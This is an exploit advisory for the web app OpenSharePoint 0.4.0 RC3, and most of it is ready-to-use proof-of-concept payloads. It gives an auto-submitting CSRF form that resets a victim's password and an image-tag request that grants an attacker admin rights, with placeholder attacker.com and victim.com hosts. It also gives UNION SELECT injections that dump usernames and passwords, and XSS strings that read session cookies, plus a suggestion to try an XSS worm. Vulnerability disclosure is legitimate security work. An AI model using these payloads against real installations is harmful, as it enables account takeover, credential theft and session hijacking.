OpenSharePoint version 0.4.0 RC3 suffers from remote SQL injection, cross site scripting, and cross site request forgery vulnerabilities.
ffa4368c38d195b0e5c5c0cb44e7351cac676530cad030d7dced9b5a52df9c13
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: OpenSharePoint 0.4.0 RC3 (16/02/2006)
Product WebSite: http://sourceforge.net/projects/opensharepoint/
#========================================================================#
#============================[CSRF]======================================#
This web application don't seems to have a token or protection for the profile
forms. With this simple HTML code we can use those forms to change the users
passwords, and if you modify it a little bit you can change all his info.
If you add an IMG tag somewhere, to exploit this issue:
<img src="http://www.attacker.com/csrf_attack.html"/>
POC:
<form method="POST" name="frmedit" action="http://www.victim.com/dir_to_OSP/module.php" enctype="multipart/form-data">
<input type="hidden" name="modname" value="Profile">
<input type="hidden" name="mf" value="pfedit">
<input type="hidden" name="ac" value="doedit">
<input type="password" name="userPassword00" value="NEW_PASSWORD">
<input type="password" name="userPassword01" value="NEW_PASSWORD">
</form>
<script>frmedit.submit()</script>
Or you can simply make yourself an ADMIN. Remember that the GROUPID number 1
is the admin group.
POC:
<img src="http://www.victim.com/dir_to_OSP/setting.php?modname=User&mf=usredit&usrid=2&ac=3&userFname=hacker&userLname=hacker&userName=USERNAME&userPassword=PASSWORD&userEmail=&userDes=&doclibId=1&userNotify=N&groupId=GROUPID">
#========================================================================#
#=============================[SQLi]=====================================#
If you have access to the website, you can extract other users passwords,
usernames, IDs, etc.*
POC:
/module.php?modname=Document&mf=docfile&doclibId=1 AND 1=0 UNION SELECT 1,2,CONCAT_WS(0x3A,userId,userName,userPassword),4,5,6,7,8 FROM focus_sp_user--
/setting.php?modname=User&mf=usredit&usrid=1 AND 1=0 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x3A,userId,userName,userPassword),7,8,9,10,11 FROM focus_sp_user--&ac=2
(*) The table prefix can be changed during the installation. I used the
default prefix: focus_sp.
#========================================================================#
#=============================[XSS]======================================#
You are hable to steal the users cookies or make any type of accion/changes
with JavaScript. You may want to try if some XSS worm with XHR works :)).
POC:
/module.php?modname=Document&doclibId=1&mf=docfind&ac=dofind&keyword="><img/src/onerror=alert(document.cookie) foo="&lookin=0
/module.php?modname=Appointment&stamp=1217473200"><img/src/onerror=alert(document.cookie) foo="
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#